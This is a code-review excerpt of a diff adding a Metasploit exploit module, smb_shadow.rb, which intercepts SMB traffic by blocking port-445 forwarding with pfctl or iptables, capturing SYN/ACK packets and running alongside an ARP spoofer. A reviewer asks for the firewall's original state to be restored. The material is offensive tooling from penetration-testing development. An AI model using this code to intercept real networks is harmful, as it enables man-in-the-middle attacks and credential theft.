modules/exploits/windows/smb/smb_shadow.rb

```diff
@@ -0,0 +1,720 @@
+    @mac = get_mac(@interface)
+    fail_with(Failure::BadConfig, "Interface does not have mac: #{@interface}") unless @mac && @mac.instance_of?(String)
+    # For future cross LAN work: (Gateway is required.)
+    # @gateip4 = datastore['GATEWAY']
+    # fail_with(Failure::BadConfig, "Invalid Gateway ip address: #{@gateip4}") unless @gateip4&.count(".") == 3
+    # @gatemac = arp(tpa: @gateip4)
+    # fail_with(Failure::BadConfig, "Unable to retrieve Gateway mac address: #{@gateip4}") unless @gatemac && @gatemac.class == String
+    @share = datastore['SHARE']
+    print_status("Self: #{@ip4} | #{@mac}")
+    # print_status("Gateway: #{@gateip4} | #{@gatemac}")
+    disable_p445_fwrd
+    start_syn_capture
+    start_ack_capture
+    print_status('INFO : This module must be run alongside an arp spoofer / poisoner.')
+    print_status('INFO : The arp spoofer used during the testing of this module is bettercap v1.6.2.')
+    main_capture
+  ensure
+    cleanup
+  end
+
+  # This prevents the TCP SYN on port 445 from passing through the filter.
+  # This allows us to have the time to modify the packets before forwarding them.
+  def disable_p445_fwrd
+    if datastore['DisableFwd'] == 'false'
+      print_status('DisableFwd was set to false.')
+      print_status('Packet forwarding on port 445 will not be disabled.')
+      return true
+    end
+    if RUBY_PLATFORM.include?('darwin')
+      pfctl = Rex::FileUtils.find_full_path('pfctl')
+      unless pfctl
+        fail_with(Failure::NotFound, 'The pfctl executable could not be found.')
+      end
+      IO.popen("#{pfctl} -f -", 'r+', err: '/dev/null') do |pf|
+        pf.write("block out on #{@interface} proto tcp from any to any port 445\n")
+        pf.close_write
+      end
+      IO.popen("#{pfctl} -e", err: '/dev/null').close
+    elsif RUBY_PLATFORM.include?('linux')
+      iptables = Rex::FileUtils.find_full_path('iptables')
+      unless iptables
+        fail_with(Failure::NotFound, 'The iptables executable could not be found.')
+      end
+      `#{iptables} -A INPUT -i #{@interface} -p tcp --destination-port 445 -j DROP`
+    else
+      print_error("WARNING : Platform not supported: #{RUBY_PLATFORM}")
+      print_error('WARNING : Packet forwarding on port 445 must be blocked manually.')
+      fail_with(Failure::BadConfig, 'Set DisableFwd to false after blocking port 445 manually.')
+    end
+    print_good('INFO : Packet forwarding on port 445 disabled.')
+    return true
+  end
+
+  def reset_p445_fwrd
+    if datastore['DisableFwd'] == 'false'
+      print_status('DisableFwd was set to false.')
+      print_status('Packet forwarding on port 445 will not be reset.')
+      return true
+    end
+    if RUBY_PLATFORM.include?('darwin')
+      pfctl = Rex::FileUtils.find_full_path('pfctl')
+      unless pfctl
+        fail_with(Failure::NotFound, 'The pfctl executable could not be found.')
+      end
+      IO.popen("#{pfctl} -d", err: '/dev/null').close
```

Comment:
According to the documentation, `pfctl -d` only disables the packet filter. The added rule is not deleted. We need to make sure the original state is restored. This also includes the state of the packet filter. If it was originally enabled, it must stay enabled. Only the new rule should be deleted.